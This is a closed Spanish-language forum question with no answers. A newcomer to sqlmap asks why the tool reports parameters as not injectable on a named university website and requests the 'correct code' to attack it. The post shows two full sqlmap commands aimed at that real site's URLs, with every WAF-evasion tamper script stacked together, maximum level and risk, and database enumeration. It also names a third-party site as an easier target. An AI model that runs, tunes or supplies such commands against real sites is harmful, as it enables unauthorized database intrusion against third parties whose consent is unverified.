El parámetro Sqlmap "podría no ser inyectable" [cerrado]

Navega tus respuestas
1

Estoy empezando con sqlmap y tengo el siguiente problema: cuando intento usar sqlmap (intentando omitir waf) usando este fragmento de código: 

sqlmap.py -u "http://prefing.umsa.edu.bo/index.php?option=com_newsfeeds&view=newsfeed&id=1&feedid=1&Itemid=18" --dbs --dbms=mysql --time-sec=10 --hex --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords

o este: 

sqlmap.py -u "http://prefing.umsa.edu.bo/index.php?view=article&catid=35:pagina-principal&id=44:inicio-central&format=pdf" --dbs --dbms=mysql --time-sec=10 --hex --string --regexp --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords

Vi que en la consola aparece: 

[WARNING] heuristic (basic) test shows that GET parameter 'option' might not be injectable 
[WARNING] heuristic (basic) test shows that GET parameter 'view' might not be injectable

También intenté encontrar una URL dentro de mi sitio similar a: http://www.cafe53rd.com/menu.php?item_id=3 porque verifiqué que este tipo de url es más fácil de acceder pero no puedo encontrarlo para el sitio que estoy auditando.

¿Cuál sería el código correcto para hacerlo en el siguiente Sitio ("http: // prefing ...")

    
pregunta Alan Alvarez 17.07.2015 - 21:50
fuente

0 respuestas

Lea otras preguntas en las etiquetas

¿Cómo debo proteger el parámetro de URL en la consulta de JPQL para restablecer el flujo de contraseña? ¿Va a hospedar un "servicio oculto", debo "borrar" o editar los metadatos del archivo?